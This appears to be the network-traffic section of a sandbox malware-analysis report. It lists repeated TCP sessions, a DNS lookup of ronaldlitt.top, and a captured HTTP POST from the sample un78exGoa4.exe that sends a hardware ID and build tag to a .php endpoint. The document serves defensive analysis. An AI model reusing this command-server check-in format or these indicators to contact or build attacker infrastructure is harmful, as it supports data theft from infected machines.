May 28, 2023 09:29:49.419868946 CEST	49749	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:49.420022964 CEST	49749	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:49.427800894 CEST	49750	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:49.483726978 CEST	80	49749	193.106.175.215	192.168.2.5
May 28, 2023 09:29:49.488110065 CEST	80	49750	193.106.175.215	192.168.2.5
May 28, 2023 09:29:49.488306999 CEST	49750	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:49.489388943 CEST	49750	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:49.489531040 CEST	49750	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:49.550061941 CEST	80	49750	193.106.175.215	192.168.2.5
May 28, 2023 09:29:49.550102949 CEST	80	49750	193.106.175.215	192.168.2.5
May 28, 2023 09:29:49.606952906 CEST	80	49750	193.106.175.215	192.168.2.5
May 28, 2023 09:29:49.607220888 CEST	49750	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:49.607361078 CEST	49750	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:49.618387938 CEST	49751	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:49.667408943 CEST	80	49750	193.106.175.215	192.168.2.5
May 28, 2023 09:29:49.682632923 CEST	80	49751	193.106.175.215	192.168.2.5
May 28, 2023 09:29:49.682841063 CEST	49751	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:49.696847916 CEST	49751	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:49.696989059 CEST	49751	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:49.760828018 CEST	80	49751	193.106.175.215	192.168.2.5
May 28, 2023 09:29:49.760884047 CEST	80	49751	193.106.175.215	192.168.2.5
May 28, 2023 09:29:49.792155027 CEST	80	49751	193.106.175.215	192.168.2.5
May 28, 2023 09:29:49.792407990 CEST	49751	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:49.792601109 CEST	49751	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:49.803962946 CEST	49752	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:49.856045008 CEST	80	49751	193.106.175.215	192.168.2.5
May 28, 2023 09:29:49.864001036 CEST	80	49752	193.106.175.215	192.168.2.5
May 28, 2023 09:29:49.864152908 CEST	49752	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:49.864597082 CEST	49752	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:49.864656925 CEST	49752	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:49.924468994 CEST	80	49752	193.106.175.215	192.168.2.5
May 28, 2023 09:29:49.924505949 CEST	80	49752	193.106.175.215	192.168.2.5
May 28, 2023 09:29:49.924757957 CEST	80	49752	193.106.175.215	192.168.2.5
May 28, 2023 09:29:49.956094980 CEST	80	49752	193.106.175.215	192.168.2.5
May 28, 2023 09:29:49.956245899 CEST	49752	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:49.956363916 CEST	49752	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:49.965595007 CEST	49753	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:50.015885115 CEST	80	49752	193.106.175.215	192.168.2.5
May 28, 2023 09:29:50.025681973 CEST	80	49753	193.106.175.215	192.168.2.5
May 28, 2023 09:29:50.025908947 CEST	49753	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:50.035825968 CEST	49753	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:50.035960913 CEST	49753	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:50.096035957 CEST	80	49753	193.106.175.215	192.168.2.5
May 28, 2023 09:29:50.096352100 CEST	80	49753	193.106.175.215	192.168.2.5
May 28, 2023 09:29:50.135049105 CEST	80	49753	193.106.175.215	192.168.2.5
May 28, 2023 09:29:50.135260105 CEST	49753	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:50.135386944 CEST	49753	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:50.143697977 CEST	49754	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:50.194905996 CEST	80	49753	193.106.175.215	192.168.2.5
May 28, 2023 09:29:50.201123953 CEST	80	49754	193.106.175.215	192.168.2.5
May 28, 2023 09:29:50.201386929 CEST	49754	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:50.201864004 CEST	49754	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:50.201924086 CEST	49754	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:50.258806944 CEST	80	49754	193.106.175.215	192.168.2.5
May 28, 2023 09:29:50.258929968 CEST	80	49754	193.106.175.215	192.168.2.5
May 28, 2023 09:29:50.258996010 CEST	80	49754	193.106.175.215	192.168.2.5
May 28, 2023 09:29:50.317609072 CEST	80	49754	193.106.175.215	192.168.2.5
May 28, 2023 09:29:50.317738056 CEST	49754	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:50.321003914 CEST	49754	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:50.334151983 CEST	49755	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:50.377657890 CEST	80	49754	193.106.175.215	192.168.2.5
May 28, 2023 09:29:50.394704103 CEST	80	49755	193.106.175.215	192.168.2.5
May 28, 2023 09:29:50.394867897 CEST	49755	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:50.395343065 CEST	49755	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:50.395420074 CEST	49755	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:50.455570936 CEST	80	49755	193.106.175.215	192.168.2.5
May 28, 2023 09:29:50.512072086 CEST	80	49755	193.106.175.215	192.168.2.5
May 28, 2023 09:29:50.512227058 CEST	49755	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:50.512347937 CEST	49755	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:50.520498991 CEST	49756	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:50.572128057 CEST	80	49755	193.106.175.215	192.168.2.5
May 28, 2023 09:29:50.584346056 CEST	80	49756	193.106.175.215	192.168.2.5
May 28, 2023 09:29:50.584534883 CEST	49756	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:50.584981918 CEST	49756	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:50.585052013 CEST	49756	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:50.648353100 CEST	80	49756	193.106.175.215	192.168.2.5
May 28, 2023 09:29:50.648384094 CEST	80	49756	193.106.175.215	192.168.2.5
May 28, 2023 09:29:50.648402929 CEST	80	49756	193.106.175.215	192.168.2.5
May 28, 2023 09:29:50.705813885 CEST	80	49756	193.106.175.215	192.168.2.5
May 28, 2023 09:29:50.705944061 CEST	49756	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:50.709021091 CEST	49756	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:50.720077038 CEST	49757	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:50.772180080 CEST	80	49756	193.106.175.215	192.168.2.5
May 28, 2023 09:29:50.783934116 CEST	80	49757	193.106.175.215	192.168.2.5
May 28, 2023 09:29:50.784086943 CEST	49757	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:50.784446001 CEST	49757	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:50.784496069 CEST	49757	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:50.847987890 CEST	80	49757	193.106.175.215	192.168.2.5
May 28, 2023 09:29:50.848196030 CEST	80	49757	193.106.175.215	192.168.2.5
May 28, 2023 09:29:50.848556042 CEST	80	49757	193.106.175.215	192.168.2.5
May 28, 2023 09:29:50.879693985 CEST	80	49757	193.106.175.215	192.168.2.5
May 28, 2023 09:29:50.879806042 CEST	49757	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:50.879900932 CEST	49757	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:50.888504982 CEST	49758	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:50.943571091 CEST	80	49757	193.106.175.215	192.168.2.5
May 28, 2023 09:29:50.949497938 CEST	80	49758	193.106.175.215	192.168.2.5
May 28, 2023 09:29:50.949636936 CEST	49758	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:50.949966908 CEST	49758	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:50.950014114 CEST	49758	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:51.010571003 CEST	80	49758	193.106.175.215	192.168.2.5
May 28, 2023 09:29:51.011131048 CEST	80	49758	193.106.175.215	192.168.2.5
May 28, 2023 09:29:51.011734009 CEST	80	49758	193.106.175.215	192.168.2.5
May 28, 2023 09:29:51.034110069 CEST	80	49758	193.106.175.215	192.168.2.5
May 28, 2023 09:29:51.034214020 CEST	49758	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:51.039040089 CEST	49758	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:51.056742907 CEST	49759	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:51.099323988 CEST	80	49758	193.106.175.215	192.168.2.5
May 28, 2023 09:29:51.117423058 CEST	80	49759	193.106.175.215	192.168.2.5
May 28, 2023 09:29:51.117548943 CEST	49759	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:51.117913008 CEST	49759	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:51.117974043 CEST	49759	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:51.178358078 CEST	80	49759	193.106.175.215	192.168.2.5
May 28, 2023 09:29:51.178883076 CEST	80	49759	193.106.175.215	192.168.2.5
May 28, 2023 09:29:51.178905964 CEST	80	49759	193.106.175.215	192.168.2.5
May 28, 2023 09:29:51.216484070 CEST	80	49759	193.106.175.215	192.168.2.5
May 28, 2023 09:29:51.216593981 CEST	49759	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:51.216728926 CEST	49759	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:51.224828959 CEST	49760	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:51.277076960 CEST	80	49759	193.106.175.215	192.168.2.5
May 28, 2023 09:29:51.285393953 CEST	80	49760	193.106.175.215	192.168.2.5
May 28, 2023 09:29:51.285552979 CEST	49760	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:51.286070108 CEST	49760	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:51.286221981 CEST	49760	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:51.346486092 CEST	80	49760	193.106.175.215	192.168.2.5
May 28, 2023 09:29:51.346514940 CEST	80	49760	193.106.175.215	192.168.2.5
May 28, 2023 09:29:51.346532106 CEST	80	49760	193.106.175.215	192.168.2.5
May 28, 2023 09:29:51.389200926 CEST	80	49760	193.106.175.215	192.168.2.5
May 28, 2023 09:29:51.389357090 CEST	49760	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:51.404644966 CEST	49760	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:51.415841103 CEST	49761	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:51.464827061 CEST	80	49760	193.106.175.215	192.168.2.5
May 28, 2023 09:29:51.476433992 CEST	80	49761	193.106.175.215	192.168.2.5
May 28, 2023 09:29:51.476594925 CEST	49761	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:51.476957083 CEST	49761	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:51.477019072 CEST	49761	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:51.538289070 CEST	80	49761	193.106.175.215	192.168.2.5
May 28, 2023 09:29:51.538316011 CEST	80	49761	193.106.175.215	192.168.2.5
May 28, 2023 09:29:51.595796108 CEST	80	49761	193.106.175.215	192.168.2.5
May 28, 2023 09:29:51.595827103 CEST	80	49761	193.106.175.215	192.168.2.5
May 28, 2023 09:29:51.595870972 CEST	49761	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:51.595895052 CEST	49761	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:51.595964909 CEST	49761	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:51.603883028 CEST	49762	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:51.655812979 CEST	80	49761	193.106.175.215	192.168.2.5
May 28, 2023 09:29:51.667258978 CEST	80	49762	193.106.175.215	192.168.2.5
May 28, 2023 09:29:51.667478085 CEST	49762	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:51.667911053 CEST	49762	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:51.667992115 CEST	49762	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:51.731882095 CEST	80	49762	193.106.175.215	192.168.2.5
May 28, 2023 09:29:51.731919050 CEST	80	49762	193.106.175.215	192.168.2.5
May 28, 2023 09:29:51.790338039 CEST	80	49762	193.106.175.215	192.168.2.5
May 28, 2023 09:29:51.790443897 CEST	49762	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:51.790529013 CEST	49762	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:51.797322035 CEST	49763	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:51.853598118 CEST	80	49762	193.106.175.215	192.168.2.5
May 28, 2023 09:29:51.857651949 CEST	80	49763	193.106.175.215	192.168.2.5
May 28, 2023 09:29:51.857819080 CEST	49763	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:51.858175039 CEST	49763	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:51.858239889 CEST	49763	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:51.918397903 CEST	80	49763	193.106.175.215	192.168.2.5
May 28, 2023 09:29:51.918466091 CEST	80	49763	193.106.175.215	192.168.2.5
May 28, 2023 09:29:51.918534994 CEST	80	49763	193.106.175.215	192.168.2.5
May 28, 2023 09:29:51.948971033 CEST	80	49763	193.106.175.215	192.168.2.5
May 28, 2023 09:29:51.952668905 CEST	49763	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:51.952788115 CEST	49763	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:52.012871981 CEST	80	49763	193.106.175.215	192.168.2.5
May 28, 2023 09:29:52.664685965 CEST	49764	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:52.728116989 CEST	80	49764	193.106.175.215	192.168.2.5
May 28, 2023 09:29:52.728245020 CEST	49764	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:52.730247021 CEST	49764	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:52.830106020 CEST	80	49764	193.106.175.215	192.168.2.5
May 28, 2023 09:29:52.830274105 CEST	49764	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:52.830394030 CEST	49764	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:52.893054008 CEST	80	49764	193.106.175.215	192.168.2.5
May 28, 2023 09:29:53.010752916 CEST	49765	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:53.071027994 CEST	80	49765	193.106.175.215	192.168.2.5
May 28, 2023 09:29:53.071201086 CEST	49765	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:53.208451033 CEST	49765	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:53.208590984 CEST	49765	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:53.268949032 CEST	80	49765	193.106.175.215	192.168.2.5
May 28, 2023 09:29:53.268981934 CEST	80	49765	193.106.175.215	192.168.2.5
May 28, 2023 09:29:53.268997908 CEST	80	49765	193.106.175.215	192.168.2.5
May 28, 2023 09:29:53.269049883 CEST	80	49765	193.106.175.215	192.168.2.5
May 28, 2023 09:29:53.269128084 CEST	80	49765	193.106.175.215	192.168.2.5
May 28, 2023 09:29:53.269129038 CEST	49765	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:53.269191027 CEST	49765	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:53.269191027 CEST	49765	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:53.269551992 CEST	80	49765	193.106.175.215	192.168.2.5
May 28, 2023 09:29:53.269602060 CEST	49765	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:53.269634008 CEST	80	49765	193.106.175.215	192.168.2.5
May 28, 2023 09:29:53.269680023 CEST	49765	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:53.269726038 CEST	80	49765	193.106.175.215	192.168.2.5
May 28, 2023 09:29:53.269774914 CEST	49765	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:53.270181894 CEST	80	49765	193.106.175.215	192.168.2.5
May 28, 2023 09:29:53.270200968 CEST	80	49765	193.106.175.215	192.168.2.5
May 28, 2023 09:29:53.270236969 CEST	49765	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:53.270255089 CEST	49765	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:53.329174995 CEST	80	49765	193.106.175.215	192.168.2.5
May 28, 2023 09:29:53.329287052 CEST	49765	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:53.329447031 CEST	80	49765	193.106.175.215	192.168.2.5
May 28, 2023 09:29:53.329466105 CEST	80	49765	193.106.175.215	192.168.2.5
May 28, 2023 09:29:53.329479933 CEST	80	49765	193.106.175.215	192.168.2.5
May 28, 2023 09:29:53.329502106 CEST	49765	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:53.329523087 CEST	49765	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:53.329550982 CEST	49765	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:53.329564095 CEST	80	49765	193.106.175.215	192.168.2.5
May 28, 2023 09:29:53.329615116 CEST	49765	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:53.329752922 CEST	80	49765	193.106.175.215	192.168.2.5
May 28, 2023 09:29:53.329797983 CEST	49765	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:53.330416918 CEST	80	49765	193.106.175.215	192.168.2.5
May 28, 2023 09:29:53.330491066 CEST	49765	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:53.330568075 CEST	80	49765	193.106.175.215	192.168.2.5
May 28, 2023 09:29:53.330624104 CEST	49765	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:53.331295967 CEST	80	49765	193.106.175.215	192.168.2.5
May 28, 2023 09:29:53.331355095 CEST	49765	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:53.331769943 CEST	80	49765	193.106.175.215	192.168.2.5
May 28, 2023 09:29:53.331830978 CEST	49765	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:53.332242012 CEST	80	49765	193.106.175.215	192.168.2.5
May 28, 2023 09:29:53.332314014 CEST	49765	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:53.332480907 CEST	80	49765	193.106.175.215	192.168.2.5
May 28, 2023 09:29:53.332534075 CEST	49765	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:53.373095036 CEST	80	49765	193.106.175.215	192.168.2.5
May 28, 2023 09:29:53.373303890 CEST	49765	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:53.389825106 CEST	80	49765	193.106.175.215	192.168.2.5
May 28, 2023 09:29:53.389858961 CEST	80	49765	193.106.175.215	192.168.2.5
May 28, 2023 09:29:53.389935017 CEST	80	49765	193.106.175.215	192.168.2.5
May 28, 2023 09:29:53.390038013 CEST	49765	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:53.390105963 CEST	49765	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:53.390295029 CEST	80	49765	193.106.175.215	192.168.2.5
May 28, 2023 09:29:53.390350103 CEST	49765	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:53.390875101 CEST	80	49765	193.106.175.215	192.168.2.5
May 28, 2023 09:29:53.390943050 CEST	49765	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:53.391266108 CEST	80	49765	193.106.175.215	192.168.2.5
May 28, 2023 09:29:53.391344070 CEST	49765	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:53.391537905 CEST	80	49765	193.106.175.215	192.168.2.5
May 28, 2023 09:29:53.391587019 CEST	49765	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:53.391733885 CEST	80	49765	193.106.175.215	192.168.2.5
May 28, 2023 09:29:53.391777039 CEST	49765	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:53.392573118 CEST	80	49765	193.106.175.215	192.168.2.5
May 28, 2023 09:29:53.392637968 CEST	49765	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:53.393100977 CEST	80	49765	193.106.175.215	192.168.2.5
May 28, 2023 09:29:53.393152952 CEST	49765	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:53.393501043 CEST	80	49765	193.106.175.215	192.168.2.5
May 28, 2023 09:29:53.393573046 CEST	49765	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:53.393816948 CEST	80	49765	193.106.175.215	192.168.2.5
May 28, 2023 09:29:53.393862963 CEST	49765	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:53.394138098 CEST	80	49765	193.106.175.215	192.168.2.5
May 28, 2023 09:29:53.394184113 CEST	49765	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:53.394473076 CEST	80	49765	193.106.175.215	192.168.2.5
May 28, 2023 09:29:53.394522905 CEST	49765	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:53.394694090 CEST	80	49765	193.106.175.215	192.168.2.5
May 28, 2023 09:29:53.394742012 CEST	49765	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:53.395018101 CEST	80	49765	193.106.175.215	192.168.2.5
May 28, 2023 09:29:53.395071030 CEST	49765	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:53.395252943 CEST	80	49765	193.106.175.215	192.168.2.5
May 28, 2023 09:29:53.395957947 CEST	80	49765	193.106.175.215	192.168.2.5
May 28, 2023 09:29:53.396094084 CEST	80	49765	193.106.175.215	192.168.2.5
May 28, 2023 09:29:53.396420956 CEST	80	49765	193.106.175.215	192.168.2.5
May 28, 2023 09:29:53.433490992 CEST	80	49765	193.106.175.215	192.168.2.5
May 28, 2023 09:29:53.450226068 CEST	80	49765	193.106.175.215	192.168.2.5
May 28, 2023 09:29:53.450262070 CEST	80	49765	193.106.175.215	192.168.2.5
May 28, 2023 09:29:53.450275898 CEST	80	49765	193.106.175.215	192.168.2.5
May 28, 2023 09:29:53.450684071 CEST	80	49765	193.106.175.215	192.168.2.5
May 28, 2023 09:29:53.451088905 CEST	80	49765	193.106.175.215	192.168.2.5
May 28, 2023 09:29:53.451575994 CEST	80	49765	193.106.175.215	192.168.2.5
May 28, 2023 09:29:53.451719999 CEST	80	49765	193.106.175.215	192.168.2.5
May 28, 2023 09:29:53.452476025 CEST	80	49765	193.106.175.215	192.168.2.5
May 28, 2023 09:29:53.452497959 CEST	80	49765	193.106.175.215	192.168.2.5
May 28, 2023 09:29:53.452596903 CEST	80	49765	193.106.175.215	192.168.2.5
May 28, 2023 09:29:53.453177929 CEST	80	49765	193.106.175.215	192.168.2.5
May 28, 2023 09:29:53.453274012 CEST	80	49765	193.106.175.215	192.168.2.5
May 28, 2023 09:29:53.453511953 CEST	80	49765	193.106.175.215	192.168.2.5
May 28, 2023 09:29:53.453761101 CEST	80	49765	193.106.175.215	192.168.2.5
May 28, 2023 09:29:53.453779936 CEST	80	49765	193.106.175.215	192.168.2.5
May 28, 2023 09:29:53.454384089 CEST	80	49765	193.106.175.215	192.168.2.5
May 28, 2023 09:29:53.454406023 CEST	80	49765	193.106.175.215	192.168.2.5
May 28, 2023 09:29:53.454862118 CEST	80	49765	193.106.175.215	192.168.2.5
May 28, 2023 09:29:53.454952002 CEST	80	49765	193.106.175.215	192.168.2.5
May 28, 2023 09:29:53.455111027 CEST	80	49765	193.106.175.215	192.168.2.5
May 28, 2023 09:29:53.455698967 CEST	80	49765	193.106.175.215	192.168.2.5
May 28, 2023 09:29:53.455722094 CEST	80	49765	193.106.175.215	192.168.2.5
May 28, 2023 09:29:53.455918074 CEST	80	49765	193.106.175.215	192.168.2.5
May 28, 2023 09:29:53.456079006 CEST	80	49765	193.106.175.215	192.168.2.5
May 28, 2023 09:29:53.456321001 CEST	80	49765	193.106.175.215	192.168.2.5
May 28, 2023 09:29:53.456393003 CEST	80	49765	193.106.175.215	192.168.2.5
May 28, 2023 09:29:53.456638098 CEST	80	49765	193.106.175.215	192.168.2.5
May 28, 2023 09:29:53.457047939 CEST	80	49765	193.106.175.215	192.168.2.5
May 28, 2023 09:29:53.457746029 CEST	80	49765	193.106.175.215	192.168.2.5
May 28, 2023 09:29:53.458005905 CEST	80	49765	193.106.175.215	192.168.2.5
May 28, 2023 09:29:53.458025932 CEST	80	49765	193.106.175.215	192.168.2.5
May 28, 2023 09:29:53.458273888 CEST	80	49765	193.106.175.215	192.168.2.5
May 28, 2023 09:29:53.458695889 CEST	80	49765	193.106.175.215	192.168.2.5
May 28, 2023 09:29:53.458915949 CEST	80	49765	193.106.175.215	192.168.2.5
May 28, 2023 09:29:53.459114075 CEST	80	49765	193.106.175.215	192.168.2.5
May 28, 2023 09:29:53.459358931 CEST	80	49765	193.106.175.215	192.168.2.5
May 28, 2023 09:29:53.493484974 CEST	80	49765	193.106.175.215	192.168.2.5
May 28, 2023 09:29:53.493697882 CEST	49765	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:53.493879080 CEST	49765	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:53.555162907 CEST	80	49765	193.106.175.215	192.168.2.5
May 28, 2023 09:29:53.800815105 CEST	49766	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:53.860219955 CEST	80	49766	193.106.175.215	192.168.2.5
May 28, 2023 09:29:53.860332966 CEST	49766	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:53.860744953 CEST	49766	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:53.947704077 CEST	80	49766	193.106.175.215	192.168.2.5
May 28, 2023 09:29:53.948880911 CEST	49766	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:53.949007034 CEST	49766	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:54.008033037 CEST	80	49766	193.106.175.215	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 28, 2023 09:29:39.799894094 CEST	65323	53	192.168.2.5	8.8.8.8
May 28, 2023 09:29:40.445825100 CEST	53	65323	8.8.8.8	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
May 28, 2023 09:29:39.799894094 CEST	192.168.2.5	8.8.8.8	0x68d5	Standard query (0)	ronaldlitt.top	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
May 28, 2023 09:29:40.445825100 CEST	8.8.8.8	192.168.2.5	0x68d5	No error (0)	ronaldlitt.top		193.106.175.215	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

ronaldlitt.top

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.5	49711	193.106.175.215	80	C:\Users\user\Desktop\un78exGoa4.exe

Timestamp	kBytes transferred	Direction	Data
May 28, 2023 09:29:40.524393082 CEST	94	OUT	POST /25d4fc7fb0cb6b78.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BAEBGCFIEHCFIDGCAAFB Host: ronaldlitt.top Content-Length: 214 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 42 41 45 42 47 43 46 49 45 48 43 46 49 44 47 43 41 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 39 31 31 45 39 33 31 43 32 43 41 32 37 30 32 36 31 31 38 32 36 0d 0a 2d 2d 2d 2d 2d 2d 42 41 45 42 47 43 46 49 45 48 43 46 49 44 47 43 41 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 42 41 45 42 47 43 46 49 45 48 43 46 49 44 47 43 41 41 46 42 2d 2d 0d 0a Data Ascii: ------BAEBGCFIEHCFIDGCAAFBContent-Disposition: form-data; name="hwid"4911E931C2CA2702611826------BAEBGCFIEHCFIDGCAAFBContent-Disposition: form-data; name="build"default------BAEBGCFIEHCFIDGCAAFB--
